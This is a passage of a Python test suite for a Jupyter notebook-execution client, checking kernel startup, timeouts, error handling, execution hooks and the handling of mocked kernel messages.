def test_startnewkernel_with_kernelmanager():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
executor.start_new_kernel()
kc = executor.start_new_kernel_client()
# prove it initialized client
assert kc is not None
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
def test_start_new_kernel_history_file_setting():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
kc = km.client()
# Should start empty
assert executor.extra_arguments == []
# Should assign memory setting for ipykernel
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# Should not add a second hist_file assignment
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
class TestExecute(NBClientTestsBase):
"""Contains test functions for execute.py"""
maxDiff = None
def test_constructor(self):
NotebookClient({})
def test_populate_language_info(self):
nb = nbformat.v4.new_notebook() # Certainly has no language_info.
executor = NotebookClient(nb, kernel_name="python")
nb = executor.execute()
assert 'language_info' in nb.metadata
def test_empty_path(self):
"""Can the kernel be started when the path is empty?"""
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
res = self.build_resources()
res['metadata']['path'] = ''
input_nb, output_nb = run_notebook(filename, {}, res)
assert_notebooks_equal(input_nb, output_nb)
@pytest.mark.xfail(
"python3" not in KernelSpecManager().find_kernel_specs(),
reason="requires a python3 kernelspec",
)
def test_empty_kernel_name(self):
"""Can kernel in nb metadata be found when an empty string is passed?
Note: this pattern should be discouraged in practice.
Passing in no kernel_name to NotebookClient is recommended instead.
"""
filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb')
res = self.build_resources()
input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res)
assert_notebooks_equal(input_nb, output_nb)
with pytest.raises(TraitError):
input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res)
def test_disable_stdin(self):
"""Test disabling standard input"""
filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res)
# We need to special-case this particular notebook, because the
# traceback contains machine-specific stuff like where IPython
# is installed. It is sufficient here to just check that an error
# was thrown, and that it was a StdinNotImplementedError
self.assertEqual(len(output_nb['cells']), 1)
self.assertEqual(len(output_nb['cells'][0]['outputs']), 1)
output = output_nb['cells'][0]['outputs'][0]
self.assertEqual(output['output_type'], 'error')
self.assertEqual(output['ename'], 'StdinNotImplementedError')
self.assertEqual(
output['evalue'],
'raw_input was called, but this frontend does not support input requests.',
)
def test_timeout(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(TimeoutError) as err:
run_notebook(filename, dict(timeout=1), res)
self.assertEqual(
str(err.value.args[0]),
"""A cell timed out while it was being executed, after 1 seconds.
The message was: Cell execution timed out.
Here is a preview of the cell contents:
-------------------
while True: continue
-------------------
""",
)
def test_timeout_func(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
def timeout_func(source):
return 10
with pytest.raises(TimeoutError):
run_notebook(filename, dict(timeout_func=timeout_func), res)
def test_kernel_death_after_timeout(self):
"""Check that an error is raised when the kernel is_alive is false after a cell timed out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
executor = NotebookClient(input_nb, timeout=1)
with pytest.raises(TimeoutError):
executor.execute()
km = executor.create_kernel_manager()
async def is_alive():
return False
km.is_alive = is_alive
# Will be a RuntimeError or subclass DeadKernelError depending
# on if jupyter_client or nbconvert catches the dead client first
with pytest.raises(RuntimeError):
input_nb, output_nb = executor.execute()
def test_kernel_death_during_execution(self):
"""Check that an error is raised when the kernel is_alive is false during a cell
execution.
"""
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(input_nb)
with pytest.raises(RuntimeError):
executor.execute()
def test_allow_errors(self):
"""
Check that conversion halts if ``allow_errors`` is False.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(allow_errors=False), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_force_raise_errors(self):
"""
Check that conversion halts if the ``force_raise_errors`` traitlet on
NotebookClient is set to True.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(force_raise_errors=True), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_reset_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, a new one must have been created
kc = executor.kc
assert kc is not None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, the previously created one must have been reused
assert kc == executor.kc
executor.execute(reset_kc=True, cleanup_kc=False)
# we asked to reset the kernel client, the previous one must have been cleaned up,
# a new one must have been created
assert kc != executor.kc
def test_cleanup_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute()
# we asked to cleanup the kernel client (default is True)
assert executor.kc is None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client
# a new one must have been created and should still be available
assert executor.kc is not None
def test_custom_kernel_manager(self):
from .fake_kernelmanager import FakeCustomKernelManager
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
executor = NotebookClient(
cleaned_input_nb,
resources=self.build_resources(),
kernel_manager_class=FakeCustomKernelManager,
)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
executor.execute()
expected = FakeCustomKernelManager.expected_methods.items()
for method, call_count in expected:
self.assertNotEqual(call_count, 0, f'{method} was called')
def test_process_message_wrapper(self):
outputs = []
class WrappedPreProc(NotebookClient):
def process_message(self, msg, cell, cell_index):
result = super().process_message(msg, cell, cell_index)
if result:
outputs.append(result)
return result
current_dir = os.path.dirname(__file__)
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
wpp = WrappedPreProc(input_nb)
executed = wpp.execute()
assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}]
assert_notebooks_equal(original, executed)
def test_execute_function(self):
# Test the execute() convenience API
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
executed = execute(original, os.path.dirname(filename))
assert_notebooks_equal(original, executed)
def test_widgets(self):
"""Runs a test notebook with widgets and checks the widget state is saved."""
input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb')
opts = dict(kernel_name="python")
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(input_file)
input_nb, output_nb = run_notebook(input_file, opts, res)
output_data = [
output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs']
]
model_ids = [
data['application/vnd.jupyter.widget-view+json']['model_id']
for data in output_data
if 'application/vnd.jupyter.widget-view+json' in data
]
wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json']
for k in model_ids:
d = wdata['state'][k]
assert 'model_name' in d
assert 'model_module' in d
assert 'state' in d
assert 'version_major' in wdata
assert 'version_minor' in wdata
def test_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_execution_hook_error(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
executor.execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_notebook_hook(self):
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(RuntimeError):
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:]:
hook.assert_called_once()
def test_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
executor.execute().execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
class TestRunCell(NBClientTestsBase):
"""Contains test functions for NotebookClient.execute_cell"""
@prepare_cell_mocks()
def test_idle_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Just the exit message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'parent_header': {'msg_id': 'wrong_parent'},
'content': {'name': 'stdout', 'text': 'foo'},
}
)
def test_message_for_wrong_parent(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An ignored stream followed by an idle
assert message_mock.call_count == 2
# Ensure no output was written
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'status',
'header': {'msg_type': 'status'},
'content': {'execution_state': 'busy'},
}
)
def test_busy_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One busy message, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_deadline_exec_reply(self, executor, cell_mock, message_mock):
# exec_reply is never received, so we expect to hit the timeout.
async def get_msg(timeout):
await asyncio.sleep(timeout)
raise Empty
executor.kc.shell_channel.get_msg = get_msg
executor.timeout = 1
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks()
def test_deadline_iopub(self, executor, cell_mock, message_mock):
# The shell_channel will complete, so we expect only to hit the iopub timeout.
message_mock.side_effect = Empty()
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock):
# Process a few messages before raising a timeout from iopub
def message_seq(messages):
yield from messages
while True:
yield Empty()
message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1])
executor.kc.shell_channel.get_msg = Mock(
return_value=make_async({'parent_header': {'msg_id': executor.parent_id}})
)
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count >= 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}}
)
def test_execute_input_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One ignored execute_input, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_stream_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout then stderr stream followed by an idle
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}},
)
def test_clear_output_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Ensure the output was cleared
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
)
def test_clear_output_wait_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Should be true without another message to trigger the clear
self.assertTrue(executor.clear_before_next_output)
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert not executor.clear_before_next_output
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
},
)
def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert executor.clear_before_next_output
# Ensure the output wasn't cleared yet because update_display doesn't add outputs
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0, execution_count=21)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 21
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'},
}
)
def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should also consume the message stream
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}},
}
)
def test_widget_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message without buffer info followed by an idle
assert message_mock.call_count == 2
self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}})
# Buffers should still be empty
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
}
)
def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 2
assert executor.widget_state == {'foobar': {'foo': 'bar'}}
assert executor.widget_buffers == {
'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
},
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]},
},
},
)
def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 3
assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}}
assert executor.widget_buffers == {
'foobar': {
('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']},
('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']},
}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {
'comm_id': 'foobar',
# No 'state'
'data': {'foo': 'bar'},
},
}
)
def test_unknown_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An unknown comm message followed by an idle
assert message_mock.call_count == 2
# Widget states should be empty as the message has the wrong shape
assert not executor.widget_state
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_with_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
}
)
def test_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar_other'},
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_display_data_same_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 4
# Original output should be manipulated and a copy of the second now
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 2
# Display updates don't create any outputs
assert cell_mock.outputs == []
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar2'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 3
# Display updates don't create any outputs
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an update then an idle
assert message_mock.call_count == 3
# Original output should be manipulated
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
}
)
def test_error_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_and_error_status_messages(self, executor, cell_mock, message_mock):
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Cell outputs should still be copied
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# OK
'content': {'status': 'ok'},
},
)
def test_error_message_only(self, executor, cell_mock, message_mock):
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_allow_errors(self, executor, cell_mock, message_mock):
executor.allow_errors = True
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error', 'ename': 'NotImplementedError'},
}
)
def test_allow_error_names(self, executor, cell_mock, message_mock):
executor.allow_error_names = ['NotImplementedError']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_raises_exception_tag(self, executor, cell_mock, message_mock):
cell_mock.metadata['tags'] = ['raises-exception']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell(self, executor, cell_mock, message_mock):
